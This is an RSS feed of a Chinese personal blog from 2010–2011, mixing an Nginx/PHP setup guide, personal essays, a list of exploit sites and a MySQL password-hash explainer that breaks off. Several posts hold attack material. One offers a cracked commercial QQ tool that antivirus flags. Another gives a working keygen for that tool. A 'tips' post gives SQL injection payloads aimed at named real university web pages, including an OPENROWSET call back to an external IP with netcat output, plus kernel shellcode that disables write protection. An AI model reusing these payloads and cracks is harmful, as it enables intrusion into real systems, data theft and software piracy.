<?xml version="1.0" encoding="utf-8"?>

<rdf:RDF
  xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
  xmlns:dc="http://purl.org/dc/elements/1.1/"
  xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
  xmlns:admin="http://webns.net/mvcb/"
  xmlns:content="http://purl.org/rss/1.0/modules/content/"
  xmlns="http://purl.org/rss/1.0/">

  <channel rdf:about="http://www.kyospace.com/">
    <title><![CDATA[KYO的地盘]]></title>
    <link><![CDATA[http://www.kyospace.com/]]></link>
    <description><![CDATA[]]></description>
    <dc:language>zh-cn</dc:language>
    <dc:creator><![CDATA[KYO]]></dc:creator>
    <dc:date>2012-02-08T11:01:27Z</dc:date>
    <admin:generatorAgent rdf:resource="http://www.kyospace.com/" />
    <admin:errorReportsTo rdf:resource="http://www.kyospace.com/"/>
    <sy:updatePeriod>hourly</sy:updatePeriod>
    <sy:updateFrequency>1</sy:updateFrequency>
    <sy:updateBase>2000-01-01T12:00+00:00</sy:updateBase>
    <items>
      <rdf:Seq>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=361">
    <title><![CDATA[配置Windows下Nginx + PHP 开发环境]]></title>
    <description><![CDATA[1 先到以下地址下载合适的版本 

http://nginx.org/en/download.html 
http://windows.php.net/download 
我下载的版本是 Nginx/Windows-0.8.36 和 PHP-5.3.2(VC9 x86 Non Thread Safe)Zip包。 
分别解压到了 
D:\webserver\nginx 
和 
D:\webserver\php 
2 配...]]></description>
    <content:encoded><![CDATA[1 先到以下地址下载合适的版本 <br><br><a target='_blank' href='http://nginx.org/en/download.html'>http://nginx.org/en/download.html</a> <br><a target='_blank' href='http://windows.php.net/download'>http://windows.php.net/download</a> <br>我下载的版本是 Nginx/Windows-0.8.36 和 PHP-5.3.2(VC9 x86 Non Thread Safe)Zip包。 <br>分别解压到了 <br>D:\webserver\nginx <br>和 <br>D:\webserver\php <br>2 配置nginx <br><br>打开D:\webserver\nginx\conf\nginx.conf <br>将从server开始的 每一行前面都增加#注释掉包括server，但是不要注释掉最后一个 } 。 <br>然后在#server前面粘贴以下内容<br> <br><br>server { <br>listen 80; <br>server_name localhost; <br>root &quot;D:/web/new/localhost&quot;; <br>index index.html index.htm index.php;<br> <br>location ~ \.php { <br>fastcgi_pass 127.0.0.1:9000; <br>fastcgi_index index.php; <br>include fastcgi.conf; <br>} <br>}<br> <br>这代表着配置了第一个虚拟主机 <br>localhost域名 将配置在D:/web/new/localhost 目录下 <br>而这里必须使用/符号 而不能使用windows格式的\符号 <br>否则会启动不来，查看日志会发现被告知找不到 D:\webew 这个目录。 <br>在新配置的server 上一行加入 <br><br><br>autoindex on;<br> <br>以打开查看目录选项，便于开发。<br> <br>然后运行d:\webserver\nginx\nginx.exe <br>在建立 D:\web\new\localhost <br>并在该文件夹随便建立几个文件和文件夹。 <br>在浏览器中输入 <a target='_blank' href='http://localhost'>http://localhost</a> <br>可以浏览目录，说明nginx启动成功。 <br>3 配置 php <br>复制D:\webserver\php\php.ini-development <br>并改名为 D:\webserver\php\php.ini <br>打开php.ini <br>查找short_open_tag = Off <br>修改为 short_open_tag = On <br>在文件末尾加入<br> <br><br>extension_dir = &quot;D:\webserver\php\ext&quot; <br><br>extension=php_curl.dll <br>extension=php_gd2.dll <br>extension=php_mbstring.dll <br>extension=php_mysql.dll <br>extension=php_mysqli.dll <br>extension=php_pdo_mysql.dll <br>extension=php_pdo_sqlite.dll <br>extension=php_sockets.dll <br>extension=php_sqlite.dll <br>extension=php_sqlite3.dll <br>extension=php_exif.dll <br>date.timezone = Asia/Chongqing<br> <br>以打开常用的扩展，并设置默认时区为重庆。 <br>保存之。 <br>下面运行 <br>D:\webserver\php\php-cgi.exe -b 127.0.0.1:9000 -c D:\webserver\php\php.ini <br>再 d:\web\new\localhost 目录下建立 phpinfo.php <br>输入<br> <br><br>&lt;?php <br>phpinfo(); <br>?&gt;<br> <br>再浏览器里输入 <a target='_blank' href='http://localhost'>http://localhost</a>/phpinfo.php <br>可以看到phpinfo信息 表示配置完成。 <br>4 制作维护脚本，并设置为开机自启动。 <br>由于是开发环境，所以不必添加为系统服务，只要开机能启动就可以了。 <br>将 d:\webserver\nginx\nginx.exe 创建一个狂接方式，并添加到 开始菜单--&gt;启动项 里面去。 <br>这样开机nginx就启动了。 <br>在 d:\webserver 文件夹下建立 nginx_reload.txt文件。 <br>里面输入<br> <br><br>d: <br>cd \webserver\nginx\ <br>nginx.exe -s reload<br> <br>然后修改扩展名，为nginx_reload.bat。 <br>这样当修改虚拟主机配置后，或修改rewrite规则后，可直接双击该文件完成nginx配置的重新加载。 <br>而不必再在任务管理器内结束2个nginx.exe进程，再双击nginx.exe以完成重启。 <br>php的启动比较特殊，启动后控制台窗口会一直停留着，如果关闭控制台，或按Ctrl C ，则php-cgi.exe进程会被终止。 <br>所以要建立一个后台运行的vbs脚本。 <br>在 d:\webserver 文件夹下建立一个 php.txt文件 <br>输入<br> <br><br>Set objShell = createObject(&quot;Wscript.Shell&quot;) <br>objShell.Run(&quot;tskill php-cgi&quot;), 0, TRUE <br>objShell.Run(&quot;D:\webserver\php\php-cgi.exe -b 127.0.0.1:9000 -c D:\webserver\php\php.ini&quot;), 0, TRUE<br> <br>并改名为php.vbs <br>这时候双击此文件，会杀掉所有正在运行的php-cgi.exe进程，并重新启动一个php-cgi.exe进程。 <br>由于是开发环境，我们只启动一个php-cgi.exe进程就可以了。 <br>将此文件创建一个快捷方式，并添加到 开始菜单--&gt;启动项 里面去。 <br>这样 php就开机自动启动了。 <br>下面可以修改一下php.ini文件，和重启一下电脑测试看看是否管用。 <br>5 配置PATH_INFO 变量，以支持PHP框架中的URL路由。 <br>现有的各种php框架中，都有url路由功能，使url格式都为 <a target='_blank' href='http://example.com/index.php/&#111;bject/acti&#111;n/value/'>http://example.com/index.php/&#111;bject/acti&#111;n/value/</a> <br>这是基于 php的全局变量 $SERVER[&#39;PATH_INFO&#39;]的。 <br>而nginx只对 php-cgi.exe进行简单的代理，并不支持 PATH_INFO。 <br>所以我们需要略微修改配置 <br>打开 d:\webserver\nginx\conf\fastcgi.conf <br>加入一行<br> <br><br>fastcgi_param PATH_INFO $fastcgi_script_name;<br> <br>打开 d:\webserver\nginx\conf\nginx.conf <br>修改所有虚拟主机配置里的<br> <br> <br> <br><br>location ~ \.php$ { <br>.... <br>}<br> <br>去掉 \.php$ 后面的$ <br>(当然，本文中的已去掉)。 <br>然后我们运行 d:\webserver\nginx_reload.bat。 <br>这时 我们的nginx 就支持 url路由了。<br>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=361]]></link>
    <dc:subject><![CDATA[黑客技术文章]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2011-12-28T21:24:03Z</dc:date>
  </item>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=360">
    <title><![CDATA[暴雨在线QQ搜索 v2011-8-15 破解版]]></title>
    <description><![CDATA[貌似是最新版，可提取QQ群信息。
官方价值98元。

加了一个壳，360报毒。不过你要是觉得不安全全的话可以不用。
密码是：1

 Click to Download 

 使用教程在这：http://soft.huoxr.com/262923863225628320342594531243.html]]></description>
    <content:encoded><![CDATA[貌似是最新版，可提取QQ群信息。<br>官方价值98元。<br><br>加了一个壳，360报毒。不过你要是觉得不安全全的话可以不用。<br>密码是：1<br><br><a href='attachments/m&#111;nth_201111/28_194034_oldrunpackTM.rar'><img src='http://www.kyospace.com/images/icon_save.gif' border='0' align='absmiddle'> <b>File:</b> Click to Download</a><br><br><font size='4'>使用教程在这：<a target='_blank' href='http://soft.huoxr.com/262923863225628320342594531243.html'>http://soft.huoxr.com/262923863225628320342594531243.html</a>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=360]]></link>
    <dc:subject><![CDATA[黑客技术文章]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2011-11-28T19:40:46Z</dc:date>
  </item>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=359">
    <title><![CDATA[暴雨在线QQ搜索注册机 暴雨在线QQ搜索破解版 暴雨在线QQ搜索2010-1-17贺岁版注册机]]></title>
    <description><![CDATA[暴雨在线QQ搜索2010-1-17贺岁版

做SEO挺方便的。算法极为简单。网页版注册机代码如下：

&lt;html&gt;
&lt;head&gt;
 &lt;title&gt;暴雨在线QQ搜索 2010-1-17贺岁版-注册机 by kyo&lt;/title&gt;
 &lt;script&gt;
 function getAnswer(){
 var username=docum...]]></description>
    <content:encoded><![CDATA[暴雨在线QQ搜索2010-1-17贺岁版<br><br>做SEO挺方便的。算法极为简单。网页版注册机代码如下：<br><br>&lt;html&gt;<br>&lt;head&gt;<br>  &lt;title&gt;暴雨在线QQ搜索 2010-1-17贺岁版-注册机 by kyo&lt;/title&gt;<br>  &lt;script&gt;<br>  function getAnswer(){<br>    var username=document.getElementById(&quot;jiqima&quot;).value;<br>    var usernamelen=username.length;<br>    var sum=&quot;&quot;;<br>    var i;<br>    for(i=1;i&lt;=usernamelen;i++){&nbsp;&nbsp;<br>      sum=sum+String.fromCharCode(username.charCodeAt(i-1)+34)+&quot;@&quot;;<br>    }<br>  document.getElementById(&quot;sn&quot;).value=sum;<br>  }<br>  &lt;/script&gt;<br>&lt;/head&gt;<br>&lt;body&gt;&lt;center&gt;<br>&lt;h3&gt;&lt;font color=red&gt;&lt;b&gt;暴雨在线QQ搜索 2010-1-17贺岁版-注册机 by kyo&lt;/b&gt;&lt;/font&gt;&lt;/h3&gt;<br>&lt;p&gt;机器码：<br>  &lt;input type=&quot;text&quot; name=&quot;jiqima&quot; value=&quot;BFEBFBFF000006F6&quot; size=40&gt;<br>&lt;/p&gt;<br>&lt;p&gt;注册码：<br>  &lt;input type=&quot;text&quot; name=&quot;sn&quot; size=40&gt;<br>&lt;/p&gt;<br>&lt;form name=&quot;form1&quot; method=&quot;post&quot; action=&quot;&quot;&gt;<br>  &lt;input name=&quot;button&quot; type=&quot;button&quot; onClick=&quot;getAnswer()&quot; value=&quot;注册&quot;/&gt;<br>&lt;/form&gt;&lt;/center&gt;<br>&lt;/body&gt;<br>&lt;html&gt;<br><br><br><a href="attachments/m&#111;nth_201111/27_165629_if8lav.jpg" target=_blank><img src='http://www.kyospace.com/images/icon_image.gif' border='0'' align='absmiddle'> <b>Image:</b> attachments/m&#111;nth_201111/27_165629_if8lav.jpg</a><br><br><font size='3'>爆破更简单，仅仅是一个跳转而已。<br>新版本《暴雨在线QQ搜索 v2011-8-15 迷你版》。貌似作者不敢放出完整版了。<br>以作者这种防范手段，放出来只能是死路一条。</font>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=359]]></link>
    <dc:subject><![CDATA[黑客技术文章]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2011-11-27T16:59:29Z</dc:date>
  </item>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=354">
    <title><![CDATA[tips7]]></title>
    <description><![CDATA[oracle绕过过滤的一种方法
使用execute immediate执行以字符表示的查询，来绕过过滤

declare
 l_cnt varchar2(20);
begin
 execute immediate 'sel'||'ect utl_inaddr.get_host_address fr'||'om dual'
 into l_cnt;
dbms_output.put_line (l_cnt);
end;
---...]]></description>
    <content:encoded><![CDATA[oracle绕过过滤的一种方法<br>使用execute immediate执行以字符表示的查询，来绕过过滤<br><br>declare<br> l_cnt varchar2(20);<br>begin<br> execute immediate &#39;sel&#39;||&#39;ect utl_inaddr.get_host_address fr&#39;||&#39;om dual&#39;<br> into l_cnt;<br>dbms_output.put_line (l_cnt);<br>end;<br>------------------------------------------------------------------------<br>至于多语句执行可以使用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES函数的漏洞注射<br>-----------------------------------------------------------------------------------------------------<br>登陆框注入<br><a target='_blank' href='http://welfare.tku.edu.tw/we_admin.aspx'>http://welfare.tku.edu.tw/we_admin.aspx</a><br><br>-1&#39; union select 1,1,1 as [password] from we_admin where &#39;1&#39;=&#39;1<br><br>1<br><br>---------------------------------------------------------------------------------------------------------------------------------<br><br>先在本地用NC监听一个端口，比如5678<br><br>然后再利用openrowset来连本机的5678端口。<br><br><a target='_blank' href='http://esquery.tku.edu.tw/acad/good1.asp?t_name=歐陽崇榮&s_dept=TABXB&classname=圖書館學統計'>http://esquery.tku.edu.tw/acad/good1.asp?t_name=歐陽崇榮&s_dept=TABXB&classname=圖書館學統計</a><br><br>&t_id=071726&#39;;select a.* FROM OPENROWSET(&#39;SQLOLEDB&#39;,&#39;116.255.144.197,1444&#39;;&#39;sa&#39;;&#39;sa&#39;,&#39;select <br><br>* FROM pubs.dbo.authors&#39;) as a;--<br><br>C:\&gt;nc -vvlp 1444<br>listening on [any] 1444 ...<br>163.13.229.43: inverse host lookup failed: h_errno 11004: NO_DATA<br>connect to [116.255.144.197] from (UNKNOWN) [163.13.229.43] 4336: NO_DATA<br><br>Pinging esquery.tku.edu.tw [163.13.229.38] with 32 bytes of data:<br>----------------------------------------------------------------------------------------------------------------------------<br>_declspec(naked)<br>就是告诉编译器，在编译的时候，不要优化代码，通俗的说就是<br>没代码，完全要自己写<br>比如<br>#define NAKED __declspec(naked)<br><br>void NAKED code(void)<br>{<br>__asm<br>{<br>ret<br>}<br>}<br>使用__declspec(naked)关键字定义函数:<br>使用 naked 关键字必须自己构建 EBP 指针 (如果用到了的话);<br>必须自己使用 RET 或 RET n 指令返回 (除非你不返回);<br><br>堆栈要自己平衡   例如：<br>VOID __declspec(naked) ShellCode()<br>{<br>__asm<br>{<br>  pushad<br>  mov eax , cr0 <br>  push eax<br>  and eax, 0xFFFEFFFF<br>  mov cr0 , eax<br>  cli <br>  mov eax , 0xAAAA5555<br>  mov dword ptr[eax] , 0x33343536<br>  sti<br>  pop eax<br>  mov cr0 , eax<br>  popad<br>  ret 0x4<br>}<br>}<br>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=354]]></link>
    <dc:subject><![CDATA[黑客技术文章]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2010-08-24T12:43:05Z</dc:date>
  </item>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=346">
    <title><![CDATA[聊城]]></title>
    <description><![CDATA[一个技术问题演变成商务问题，紧接着又演变为政治问题，我无法理解中国的官场社会。

相对来说，我更喜欢与0和1打交道，人还是太复杂，我没有办法掌控对方的思维下一秒在想什么。所以对于不确定的事，我没有任何兴趣，也不想有任何兴趣。

聊城的温泉还是很不错的，...]]></description>
    <content:encoded><![CDATA[一个技术问题演变成商务问题，紧接着又演变为政治问题，我无法理解中国的官场社会。<br><br>相对来说，我更喜欢与0和1打交道，人还是太复杂，我没有办法掌控对方的思维下一秒在想什么。所以对于不确定的事，我没有任何兴趣，也不想有任何兴趣。<br><br>聊城的温泉还是很不错的，只是一个人的旅游能算是旅游吗？说它是为公事出差附带的附属品我倒没什么意见。<br><br>另外对于没有共同语言的人，我一般喜欢选择沉默。有时候为了避免所接触的人把&quot;不合群&quot;这个贬义词强加到我的头上，我曾经试图改变我自己，会附和着一些不着边或者连我自己都不知道的话，现在回头想想才发现这种做法很幼稚，幼稚的让我一个人独处时想起来还会觉得可笑。深思之后我会发现，在这个世界上我在意的人屈指可数，何必委屈自己附和那些不着边际的人呢？<br><br>古人云：无欲则刚。这四个字还是很有哲学道理的。<br> <br><br>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=346]]></link>
    <dc:subject><![CDATA[KYO--随笔]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2010-04-21T23:16:04Z</dc:date>
  </item>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=345">
    <title><![CDATA[黑客网址记录]]></title>
    <description><![CDATA[0day发布网址Tags&gt;&gt;0day发布网址 
1 http://www.frsirt.com


1.http://www.exploit-db.com/

2 http://www.derkeiler.com
http://www.h4cky0u.org

3 http://www.security.nnov.ru/ http://securityvulns.com/

http://governmentsecurity.org/

4 ...]]></description>
    <content:encoded><![CDATA[0day发布网址Tags&gt;&gt;0day发布网址  <br>1 <a target='_blank' href='http://www.frsirt.com'>http://www.frsirt.com</a><br><br><br>1.<a target='_blank' href='http://www.exploit-db.com/'>http://www.exploit-db.com/</a><br><br>2 <a target='_blank' href='http://www.derkeiler.com'>http://www.derkeiler.com</a><br><a target='_blank' href='http://www.h4cky0u.org'>http://www.h4cky0u.org</a><br><br>3 <a target='_blank' href='http://www.security.nnov.ru/'><a target='_blank' href='http://www.security.nnov.ru/'>http://www.security.nnov.ru/</a></a>   <a target='_blank' href='http://securityvulns.com/'>http://securityvulns.com/</a><br><br><a target='_blank' href='http://governmentsecurity.org/'>http://governmentsecurity.org/</a><br><br>4 <a target='_blank' href='http://pforum.pccenter.com.tw/viewthread.php?tid=67&extra=page%3D1'>http://pforum.pccenter.com.tw/viewthread.php?tid=67&extra=page%3D1</a><br><br>5 <a target='_blank' href='http://www.swerat.com/forums/index.php?act=Login&CODE=01'>http://www.swerat.com/forums/index.php?act=Login&CODE=01</a><br><br>6 <a target='_blank' href='http://chasenet.org/'>http://chasenet.org/</a> <br><br>7 <a target='_blank' href='http://swerat.com/'>http://swerat.com/</a><br><a target='_blank' href='http://www.neoteam.com.br'>http://www.neoteam.com.br</a><br>我先来几个我认为比较好的<br><a target='_blank' href='http://packetstormsecurity.nl/'>http://packetstormsecurity.nl/</a><br><a target='_blank' href='http://hack.com.ru/'>http://hack.com.ru/</a><br><a target='_blank' href='http://www.hackcoza.tk/'>http://www.hackcoza.tk/</a><br><a target='_blank' href='http://www.web-hack.ru/'>http://www.web-hack.ru/</a><br><a target='_blank' href='http://www.securiteam.com/'>http://www.securiteam.com/</a><br><a target='_blank' href='http://www.security.nnov.ru/'>http://www.security.nnov.ru/</a><br><a target='_blank' href='http://www.hackerzhell.co.uk/indexmain.php'>http://www.hackerzhell.co.uk/indexmain.php</a><br><a target='_blank' href='http://hacktheb0x.tk/'>http://hacktheb0x.tk/</a><br><a target='_blank' href='http://neworder.box.sk/'>http://neworder.box.sk/</a><br><a target='_blank' href='http://www.k-otik.com/'>http://www.k-otik.com/</a><br><a target='_blank' href='http://www.security-corporati&#111;n.com/'>http://www.security-corporati&#111;n.com/</a><br><a target='_blank' href='http://www.securityfocus.com/'>http://www.securityfocus.com/</a><br><br>8 <a target='_blank' href='http://metasploit.blogspot.com/'>http://metasploit.blogspot.com/</a><br><br><br>9 <a target='_blank' href='http://www.godexp.org/'>http://www.godexp.org/</a><br><a target='_blank' href='http://www.milw0rm.com/'>http://www.milw0rm.com/</a><br><br>自己珍藏的0day漏洞发布网址<br><br>这些都是我珍藏的好的漏洞发布网址:<br>国外:<br><a target='_blank' href='http://www.frsirt.com/exploits/'>http://www.frsirt.com/exploits/</a><br><a target='_blank' href='http://es.wikipedia.org/wiki/Exploit'>http://es.wikipedia.org/wiki/Exploit</a><br><a target='_blank' href='http://www.securiteam.com/'>http://www.securiteam.com/</a>exploits<br>国内:<br><a target='_blank' href='http://www.z1z8.com/'>http://www.z1z8.com/</a><br><a target='_blank' href='http://forum.eviloctal.com/simple/index.php?f22.html'>http://forum.eviloctal.com/simple/index.php?f22.html</a> <br><br>//////////////////////////////////////////////////////////////////////////<br><br><br>国外安全 <a target='_blank' href='http://www.neohapsis.com/'>http://www.neohapsis.com/</a> 内容极为丰富<br>国外安全 <a target='_blank' href='http://www.deadly.org/'>http://www.deadly.org/</a> 大量关于OpenBSD的资料文档教程 <br>国外安全 <a target='_blank' href='http://www.guninski.com/'>http://www.guninski.com/</a> 安全专家Guninski的主页，有大量由系统漏洞 <br>国外安全 <a target='_blank' href='http://www.sysinternals.com'>http://www.sysinternals.com</a> 有很好的windows下的工具及源代码 <br>国外安全 <a target='_blank' href='http://www.securityflaw.com/bible/'>http://www.securityflaw.com/bible/</a> 入侵检测等文档整理较好的站点 <br>国外安全 <a target='_blank' href='http://www.secinf.net/'>http://www.secinf.net/</a> 网络安全方面的大量文档<br>国外安全 <a target='_blank' href='http://www.incident-resp&#111;nse.org'>http://www.incident-resp&#111;nse.org</a> 入侵反应，数据恢复工具等  <br>国外安全 <a target='_blank' href='http://www.securityfocus.com/'>http://www.securityfocus.com/</a> 安全资料整合最好的站 <br>国外安全 <a target='_blank' href='http://www.project.h&#111;neynet.org/'>http://www.project.h&#111;neynet.org/</a> 由安全界一帮牛人组织的一个<br><br>国外安全 <a target='_blank' href='http://www.packetstormsecurity.com'>http://www.packetstormsecurity.com</a> 资料全面的安全站<br><br>国外安全 <a target='_blank' href='http://www.securityportal.com/'>http://www.securityportal.com/</a> 还可以看看的安全站<br><br>国外安全 <a target='_blank' href='http://www.ussrback.com/'>http://www.ussrback.com/</a> 比较活跃的安全站 <br>国外安全 <a target='_blank' href='http://www.attriti&#111;n.org/'>http://www.attriti&#111;n.org/</a> 内容全面的安全站<br>国外安全 <a target='_blank' href='http://www.wiretrip.net/rfp/2/index.asp'>http://www.wiretrip.net/rfp/2/index.asp</a> rfp的安全主页，提供权威的安全信息<br><br>国外安全 <a target='_blank' href='http://www.anti&#111;nline.com/'>http://www.anti&#111;nline.com/</a> 有些特色栏目的安全站 <br>国外安全 <a target='_blank' href='http://www.eeye.com/'>http://www.eeye.com/</a> eeye公司的主页，提供权威性的安全建议和工具<br>国外安全 <a target='_blank' href='http://www.insecure.org/'>http://www.insecure.org/</a> Fyodor的主页，nmap的老家，还有exploit <br>国外安全 <a target='_blank' href='http://www.atstake.com/'>http://www.atstake.com/</a> @stack公司的主页，提供权威的安全建议 <br>国外安全 <a target='_blank' href='http://www.bugnet.com/'>http://www.bugnet.com/</a> 提供漏洞修补 国外黑客 <a target='_blank' href='http://lsd-pl.net/'>http://lsd-pl.net/</a> LsD的站,最新最有效的exploit  <br>国外黑客 <a target='_blank' href='http://www.s0ftpj.org'>http://www.s0ftpj.org</a> 提供一些水平很高的小工具 }\]{f6&#39;  <br>国外黑客 <a target='_blank' href='http://phrack.org/'>http://phrack.org/</a> Phrack的主页，经典的黑客技术电子杂志 <br>国外黑客 <a target='_blank' href='http://www.w00w00.org/'>http://www.w00w00.org/</a> w00w00组织的主页 <br>国外黑客 <a target='_blank' href='http://mixter.void.ru/'>http://mixter.void.ru/</a> Mixter的个人主页，不少有用的工具 <br>国外黑客 <a target='_blank' href='http://www.thehackerschoice.com/'>http://www.thehackerschoice.com/</a> THC黑客组织的页面，很好的安全文档和工具<br>国外黑客<a target='_blank' href='http://'>http://</a> www.win2000mag.net Windows & .NET Magazine Network 绝对专业的站点,文章都是一流的 <br><br>国外黑客 <a target='_blank' href='http://www.2600.com/'>http://www.2600.com/</a> 2600 Magazine <br>国外黑客 <a target='_blank' href='http://www.experts-exchange.com'>http://www.experts-exchange.com</a> 全球有名的社区 <br>国外黑客 <a target='_blank' href='http://www.is-it-true.org'>http://www.is-it-true.org</a> 类似于FAQ的站点，资源丰富<br>国外黑客 <a target='_blank' href='http://www.mixter.warrior2k.com'>http://www.mixter.warrior2k.com</a> mixter security <br>国外黑客 <a target='_blank' href='http://www.liun.hektik.org'>http://www.liun.hektik.org</a> Long Island our Underground Networks <br>国外黑客 <a target='_blank' href='http://www.ussrback.com'>http://www.ussrback.com</a> ussr is back <br>国外黑客 <a target='_blank' href='http://www.securiteam.com'>http://www.securiteam.com</a> 非常好的安全文章漏洞利用工具下载站点 <br>国外黑客 <a target='_blank' href='http://www.lsd-pl.net'>http://www.lsd-pl.net</a> The Last Stage of Delirium Research Group <br>国外黑客 <a target='_blank' href='http://www.'>http://www.</a> neworder.box.sk Box Network team<br>国外黑客 <a target='_blank' href='http://www.'>http://www.</a>sysinternals.com sysinternals <br>国外黑客 <a target='_blank' href='http://www.'>http://www.</a>webattack.com<br>国外黑客 <a target='_blank' href='http://www.'>http://www.</a>blackhat.com Black Hat, Inc A64bZ<br>国外黑客 <a target='_blank' href='http://p.ulh.as'>http://p.ulh.as</a> pulhas <br>国外常用网站站点 <a target='_blank' href='http://www.google.com'>http://www.google.com</a> 最好的页面搜索引擎 <br><br>国外常用网站站点 <a target='_blank' href='http://www.netcraft.com'>http://www.netcraft.com</a> 很好的域名搜索引擎<br><br>国外常用网站站点 <a target='_blank' href='http://www.checkdomain.com'>http://www.checkdomain.com</a> 域名信息检索器<br><br>国外常用网站站点 <a target='_blank' href='http://astalavista.box.sk'>http://astalavista.box.sk</a> 最好的注册码、注册机、序列号搜索引擎<br><br>收藏~<br>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=345]]></link>
    <dc:subject><![CDATA[黑客技术文章]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2010-04-16T09:14:19Z</dc:date>
  </item>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=343">
    <title><![CDATA[然后]]></title>
    <description><![CDATA[不知从什么时候起，我注意到现在越来越多的人说话已经离不开“然后”这个词了。特别是现实生活中人与人之间对话中的只言片语很容易体现出这一点。为了对抗这个无聊的世界，我也是没事找事做，思考了这一现象的原因。

 我觉得这一现象归根结底就是人们语言表达能力退化...]]></description>
    <content:encoded><![CDATA[不知从什么时候起，我注意到现在越来越多的人说话已经离不开&quot;然后&quot;这个词了。特别是现实生活中人与人之间对话中的只言片语很容易体现出这一点。为了对抗这个无聊的世界，我也是没事找事做，思考了这一现象的原因。<br><br>        我觉得这一现象归根结底就是人们语言表达能力退化的一个标志。大多数人不能在短时间内思考到前一句话与后一句话之间的存在的某种联系，一时又想不出较为合适的词语来衔接，只能用拙劣的&quot;然后&quot;来代替。并且我发现&quot;然后&quot;这个词其实是万能的，不论是因果关系、转折关系、前言不搭后语关系，使用它后倒显得挺自然的。再一点，两个人在对话时，一方为了不凸显自己吞吞吐吐的尴尬，&quot;然后&quot;一词一出就可以为自己赢得5秒钟思考时间来准备下一句的内容，甚至故意把它拖得很长，以便可以理直气壮的思考一大会儿。<br><br>也许还有下面一个原因，是我从百度搜出来的结果：<br><br>&quot;就是因为大家看了太多台湾电视电影才传过来的啊，呵呵。&quot;<br><br>        其实我亦是一样的。在这个信息化的时代，计算机所带来的优点当然是数不胜数，可是它却让人们之间的交流变得越来越少，亲人与亲人之间、朋友与朋友之间、同学与同学之间，言语上的都变得淡漠。<br>//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br><br>       全民种菜，然后凸显全民无聊，然后中国人大多数其实都很无聊，然后我发现北京人大多数都喜欢说自己多牛逼、谁谁谁多牛逼，然后我觉得谁都不牛逼，然后我心中的神已死，然后我觉得其实只有死了的人才牛逼。<br>//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=343]]></link>
    <dc:subject><![CDATA[KYO--随笔]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2010-03-30T10:35:04Z</dc:date>
  </item>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=342">
    <title><![CDATA[mysql 口令算法]]></title>
    <description><![CDATA[唠一唠mysql的口令算法

Author: kyo327
email: humour327#hotmail.com
Date: 2010-03-10

大家都知道mysql口令的加密分两种。一种是古董级别的mysql323加密，另一种是蒙骗了大众的的mysql sha1加密。
虽然现在遇到这样的加密可以用cain来破解，按说我不用在这里...]]></description>
    <content:encoded><![CDATA[唠一唠mysql的口令算法<br><br>Author: kyo327<br>email: humour327#hotmail.com<br>Date: 2010-03-10<br><br>大家都知道mysql口令的加密分两种。一种是古董级别的mysql323加密，另一种是蒙骗了大众的的mysql sha1加密。<br>虽然现在遇到这样的加密可以用cain来破解，按说我不用在这里多此一举，但本文不是为了破解而写，只是科普一下，让大家更清楚的了解mysql口令的加密方法到底是怎样的。<br><br>先说mysql4.1.x版本以后的：<br><br>mysql&gt; select password(&#39;kyo327&#39;);<br>+-------------------------------------------+<br>| password(&#39;kyo327&#39;)                        |<br>+-------------------------------------------+<br>| *B19CB640DF626A73397BFBBB8111D11E2BEC11F1 |<br>+-------------------------------------------+<br>1 row in set (0.02 sec)<br><br>mysql&gt; select sha1(&#39;kyo327&#39;);<br>+------------------------------------------+<br>| sha1(&#39;kyo327&#39;)                           |<br>+------------------------------------------+<br>| d81e2a1a72f5a4f570b0f05baaa0cffc5d2d6820 |<br>+------------------------------------------+<br>1 row in set (0.03 sec)<br><br><br>很明显不是标准的sha1加密。然而这个问题像是皇帝的新装一样，好像没有哪个人指出来，那我就在这里当一次无知的小孩吧。 再看下面<br><br>mysql&gt; select sha1(0xd81e2a1a72f5a4f570b0f05baaa0cffc5d2d6820);<br>+--------------------------------------------------+<br>| sha1(0xd81e2a1a72f5a4f570b0f05baaa0cffc5d2d6820) |<br>+--------------------------------------------------+<br>| b19cb640df626a73397bfbbb8111d11e2bec11f1         |<br>+--------------------------------------------------+<br>1 row in set (0.00 